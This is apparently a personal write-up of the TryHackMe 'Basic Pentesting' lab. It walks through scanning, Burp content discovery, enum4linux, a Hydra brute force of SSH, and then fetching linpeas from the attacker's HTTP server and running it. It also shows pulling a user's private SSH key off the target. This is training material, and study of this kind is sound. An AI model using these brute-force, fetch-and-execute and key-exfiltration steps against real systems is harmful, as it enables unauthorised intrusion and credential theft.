TryHackMe Writeup: Basic Pentesting Room

5 min readJan 31, 2021

Upon deploying the lab, I started enumeration on the IP provided to me:

nmap -sC -sV -sT -sU 10.10.6.124

We note that SSH, Samba/SMB, Apache webserver and apache jserv are running

Viewing the source code of the page, there is a comment to visit the “dev note” section. However, we don’t know where that is, as there aren’t any links to this page as referenced. So we have a few options to proceed. We can use GoBuster to try and brute force directories, or we can use Burp. I chose burp. So I fired it up, intercepted the initial request to the page, and sent it to content discovery:

Right-click >> Engagement tools >> Discover content >> config

To speed up the discovery and make it more focused, I removed the checkmarks from “Built in long file list” and “built in long directory list”. Instead, I loaded a dirbuster list:

directory-list-lowercase-2.3-medium.txt

Once done, I returned to the first tab and started the discovery. The results returned back rather quickly and behold…. We see the potentially referenced pages!

Both txt files appear to be notes between two colleagues “J” and “K”. The Dev.txt noted a few interesting points. The colleagues noted that apache struts is installed, and at version 2.5.12. It also notes that SMB has been configured (which we already knew via our enumeration). The second file, j.txt is a little more interesting. It notes that “J” is using a weak password…. “Password” maybe? Only time will tell.

Visiting the other web port, we’re presented with a default tomcat config page. Nothing too notable here

We don’t have a whole lot of info to go off of at this time, so lets do some further enumeration. Since we know that we have an apache webserver that has samba implemented, we can discern that this is likely a linux box. So lets run enum4linux

enum4linux 10.10.6.124

Looks like we have some valid usernames!

BASIC2\nobody

User\kay

User\jan

Not only do we have some valid usernames, but we should probably focus on Jan’s username since it was noted that she has a weak password earlier in our process. Lets try to brute force our way into ssh with Jans username. We are going to use Hydra-gtk and the “rockyou” wordlist. After configuring hydra and spraying the server, we came out with some valid credentials:

SSH’ing in works, and we now have a user with standard privs. Jan doesn’t appear to have sudo privs. Also, listing out apps and processes that have root permissions doesn’t return anything particularly interesting. Before browsing, I’m going to do a little more enumeration. So I spun up a python webserver in order to move linpeas over to the target machine. So I navigate to the local folder containing the script, then started up the server

python -m SimpleHTTPServer 8008

Then from the target machine, I fetched the file and executed it

cd /tmp

wget <myIP>:8008/linpeas.sh

chmod +x linpeas.sh

./linpeas.sh | tee linpeas.sh

Linpeas didn’t find much, but it did disclose that we have access to Kays SSH private key!

So we will take the same route to get the key that we used earlier to retrieve linpeas. We will spin up a simple http server, wget the file over to our local machine, then give it proper permissions to utilize the key and log in as Kay.

Target: python -m SimpleHTTPServer 8008

Local: wget <TARGET_IP>:8008/id_rsa

chmod 600 id_rsa

ssh -i id_rsa kay@<TARGET_IP>

Annnnndddddddd….. FAIL! Looks like we still need the passphrase.